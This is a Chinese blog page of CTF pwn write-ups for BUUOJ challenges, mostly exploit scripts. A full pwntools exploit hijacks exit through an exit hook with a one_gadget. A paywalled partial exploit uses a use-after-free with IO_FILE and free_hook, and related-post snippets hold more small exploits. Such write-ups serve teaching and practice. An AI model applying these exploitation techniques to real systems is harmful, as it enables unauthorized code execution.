buuoj Pwn writeup 201-205

最新推荐文章于 2024-01-18 09:58:35 发布
原创 最新推荐文章于 2024-01-18 09:58:35 发布 · 587 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细分析了多个CTF挑战,涉及栈溢出、未初始化指针利用、堆管理漏洞及libc地址泄露等技术。通过创建shellcode、劫持程序流程、利用fastbin攻击泄露libc地址,最终实现getshell。文章揭示了多种常见的二进制安全漏洞利用方法。

201 bbctf_2020_write

在这里插入图片描述
canary是没有开的。环境是2.27的一个环境。

在这里插入图片描述
可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。
又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。

那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。
exit没有hook,我们考虑怎么能把exit劫持掉。
劫持exit

简单点说就是。
exit()->__run_exit_handlers->_dl_fini->__rtld_lock_unlock_recursive
由于__rtld_lock_unlock_recursive存放在结构体空间,为可读可写,那么如果可以修改__rtld_lock_unlock_recursive,就可以在调用exit()时劫持程序流。

exp

from pwn import*

context.log_level = "debug"

#r = process("./201")
r = remote("node4.buuoj.cn", "29284")


libc = ELF("./64/libc-2.27.so")

r.recvuntil("0x")
puts_addr = int(r.recv(12), 16)
r.recvuntil("0x")
stack_addr = int(r.recv(12), 16)

ret_addr = stack_addr + 0x20
libc_base = puts_addr - libc.sym['puts']
one_gadget = libc_base + 0x4f322
print "libc_base = " + hex(libc_base)
exit_hook = libc_base + 0x619f68

r.recvuntil("(q)uit\n")
r.sendline("w")

r.sendline(str(exit_hook))
r.sendline(str(one_gadget))

#gdb.attach(r)

r.recvuntil("(q)uit\n")
r.sendline("q")

r.interactive()


'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

202 ciscn_2019_c_5

在这里插入图片描述

在这里插入图片描述
名字跟id就有了。

add
在这里插入图片描述大小,chunk地址,都子啊bss上,一个chunk的信息也都相邻。

没有edit、show。

free
在这里插入图片描述free这里有个uaf。

没有输出的话我们还是考虑需要去攻击IO_FILE。

劫持IO_FILE的时候因为我们只修改后20bit,但是没办法只能改到24bit,所以我们还必须爆破一下。

通过fastbin攻击来泄露libc地址,然后故技重施劫持free_hook,来gelshell。

exp

# -*- coding: utf-8 -*-
from pwn import*

#context.log_level = "debug"

def add(size, content):
    r.sendlineafter("Input your choice:", "1")
    r.sendlineafter("Please input the size of story: \n", str(size))
    r.sendafter("please inpute the story: \n", content)

def delete(index):
    r.sendlineafter("Input your choice:", "4")
    r.sendlineafter("Please input the index:\n", str(index))


libc = ELF('./64/libc-2.27.so')
_IO_2_1_stdout_s = libc.symbols['_IO_2_1_stdout_']
free_hook_s = libc.symbols['__free_hook']

def exp():
    r.sendlineafter("What's your name?\n", "Yongibaoi")
    r.sendlineafter("Please input your ID.\n", "0")

    add(0x7F,
最低0.47元/天 解锁文章
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 457
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 126-130
yongbaoii的博客
05-11 362
126 护网杯_2018_gettingstart 保护 程序就这么点,逻辑也简单。 然后有个栈溢出。 然后就修改修改就好了嘛,把v7改成0x7fffffffffffffff,v8改成0.1 exp from pwn import* r = remote("node3.buuoj.cn", 28793) #r = process("./126") payload = 'a' * 0x18 + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A) r.re
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 661
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
hfctf_2020_marksman
z1r0的博客
03-20 645
hfctf_2020_marksman 查看保护 这里输入地址,然后改这个地址的低三个字节,也就是任意地址写三字节 攻击思路:这里最关键是需要劫持哪一个地址然后跳转到哪一个gadget。 为什么会说跳转到哪一个gadget? 在这个函数中会将一些gadget给禁用掉,举第一个例子 可以看到这个gadget被禁用了。 1.首先题目给了puts的地址。拿到Libc 2.写入要覆盖的地址,这里可以选择libc的got地址(这里笔者也学到了.got.plt一般是可写的,查看保护看的只是got不可写而已,笔
变量是什么_GOT劫持PWN
weixin_39628247的博客
12-08 656
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。上次介绍IO FILE的pwn题目时,提到exit函数中,会调用标准...
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 364
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 骇极杯_2018_babyarm 249 metasequoia_2020_samsara
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 384
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 473
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
祥云杯2022 pwn - bitheap
z1r0的博客
11-01 518
需要注意的是d60这个函数,经过调试之后可以得知传入的内容需要使用二进制来示,所以就写了一个decode。2.27下的off-by-one,其实也可以看成off-by-null。接下来就是板子直接套 2.27的off-by-null。
PWN · 格式化字符串|劫持GOT】[watevrCTF 2019]Voting Machine 2]
最新发布
Mr_Fmnwon的博客
01-18 860
和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。可以通过后门函数获得flag或者getshell获得flag存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。
exit_hook劫持
starssgo的博客
04-13 5998
更改exit()某一结构体,再调用exit()可以实现程序流程的劫持。 原理分析 首先查看exit()源代码,我的libc=2.27 调用__run_exit_handlers函数,查看源代码, exit.c 77行。 while (cur->idx > 0) { struct exit_function *const f = &cur->fns[-...
鹏程杯2018 Pwn Writeup
Kaller的博客
12-05 1594
PWN  code   hash爆破(By:Apeng师傅): 得到wyBTs。 这里栈溢出,控制 ret后,“pop rdi ret”用来调用call。 1.leak_libc 把puts的got.plt用puts函数输出 2.计算偏移,得到system和字符串/bin/sh 3.调用system。 from pwn import * context.log...
pwn题bbctf_2020_fmt_me
热门推荐
stareforever的博客
12-21 2万+
BUUCTF pwn题bbctf_2020_fmt_me 题目流程 snprintf 格式化漏洞 用gdb查看第一个参数的内容即可观察 参数位置在bss 0x4040a0 偏移为6 那么依据题目的意思 可以将atoi 改为system_plt; 将system_got改为main返回再次输入/bin/sh获得shell 完整ex.py ...
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1212
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
hitcon training lab12(secretgarden)
m0_62326489的博客
08-12 257
hfctf_2020_marksman(劫持exit_hook或dlopen)
tbsqigongzi的博客
08-12 1163
劫持exit_hook或dlopen
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1404
CISCN2021pwn pwny(数组越界,劫持exit_hook)
hitcontraining_secretgarden
xy1458214551的博客
12-14 255
BUUCTF的hitcontraining_secretgarden
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值